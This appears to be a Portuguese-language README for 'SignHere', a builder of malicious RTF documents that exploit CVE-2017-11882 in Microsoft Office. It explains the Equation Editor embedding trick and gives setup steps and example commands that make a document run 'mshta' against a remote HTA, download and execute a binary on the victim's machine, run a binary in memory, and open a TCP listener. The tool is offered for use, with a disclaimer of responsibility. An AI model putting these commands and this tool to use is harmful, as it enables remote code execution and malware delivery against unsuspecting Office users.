
SignHere é a implementação do CVE-2017-11882. SignHere é um construtor de documentos rtf maliciosos e payloads VBScript.
CVE-2017-11882 – O identificador único de vulnerabilidade do Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1 e Microsoft Office 2016 permite que um invasor execute código no contexto do usuário atual sem tratar corretamente os objetos na memória, a chamada "Vulnerabilidade de corrupção de memória do Microsoft Office". A implementação inclui a criação de um programa para construir documentos RTF maliciosos e payloads em VBScript
São os documentos RTF que são vulneráveis por poderem ser "programados" conhecendo comandos especiais – cabeçalhos RTF. Assim, um objeto binário (executável) é criado no corpo do documento, na verdade é uma fórmula do Microsoft Equation com o código que contém o comando cmd. Em seguida, pode-se gerar o payload em VBScript e usar o comando "mshta link para o arquivo de payload" para executar o arquivo hta.
O autor e os colaboradores não são responsáveis por quaisquer danos causados a você ou por você.
Você pode usar Termux, mas a execução do programa requer root
git clone https://github.com/Retr0-code/SignHere/
cd SignHere/
chmod +x SignHere.py
./SignHere.py --help
Primeiro, você precisa baixar o arquivo. Depois descompacte-o e abra uma janela do PowerShell nesta pasta e escreva:
.\SignHere.py --help
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --powershell "start iexplore.exe https://github.com/Retr0-code/SignHere" --ip 192.168.1.74 --output generated.rtf
--cmd Argumento com o comando do Windows que será executado após abrir o documento.
--powershell Argumento com o comando do PowerShell que estará no payload VBScript.
--ip Argumento com o endereço IP que será usado para o servidor web. (padrão: 127.0.0.1)
--output Nome e caminho do documento.
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --temp exploit.exe --ip 192.168.1.74 --output generated.rtf
--temp Argumento que usará um arquivo binário como payload (o arquivo binário será iniciado na memória RAM).
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --payload exploit.exe --ip 192.168.1.74 --listener-host 192.168.1.74 --output generated.rtf
--payload Argumento que baixará o arquivo no computador da vítima e o executará.
--listener-host Argumento para iniciar um listener TCP no IP atual (padrão: 127.0.0.1)